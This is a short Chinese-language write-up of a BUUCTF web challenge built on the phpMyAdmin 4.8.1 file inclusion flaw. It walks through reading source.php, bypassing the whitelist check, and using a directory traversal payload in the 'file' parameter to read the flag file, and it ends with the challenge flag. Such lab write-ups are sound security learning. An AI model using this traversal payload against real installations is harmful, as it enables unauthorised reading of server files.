记一次phpmyadmin 4.8.1 远程文件包含漏洞(BUUCTF web)

 

题目很简单,一个滑稽

打开源码,发现存在source.php文件

 记一次phpmyadmin 4.8.1 远程文件包含漏洞(BUUCTF web)_第1张图片

于是访问文件,发现出现一串php源码

 记一次phpmyadmin 4.8.1 远程文件包含漏洞(BUUCTF web)_第2张图片

提示存在hint.php,于是访问发现一句话

flag not here, and flag in ffffllllaaaagggg

再回过头来观察source.php明显是一道代码审计的问题,其中存在4个限制条件

记一次phpmyadmin 4.8.1 远程文件包含漏洞(BUUCTF web)_第3张图片

 

 

$_REQUEST['file']需要在白名单内,白名单内只有source.php和hint.php

$_REQUEST['file']不为空

$_REQUEST['file']必须是字符串

$_REQUEST['file']需要绕过checkFile函数

于是考虑构造paylaod,index.php?file=hint.php?/ffffllllaaaagggg

发现页面空白,于是通过百度,这是一个phpmyadmin 4.8.1 远程文件包含漏洞

https://www.cnblogs.com/leixiao-/p/10265150.html

可以通过目录穿越获取获取flag文件

于是再次构建payload,/index.php?file=hint.php?/../../../../ffffllllaaaagggg

获取flag

flag{k9oct67wctkmbsdkhi32yiip74vsqlvu}

 

转载于:https://www.cnblogs.com/MisakaYuii-Z/p/11260331.html

你可能感兴趣的:(记一次phpmyadmin 4.8.1 远程文件包含漏洞(BUUCTF web))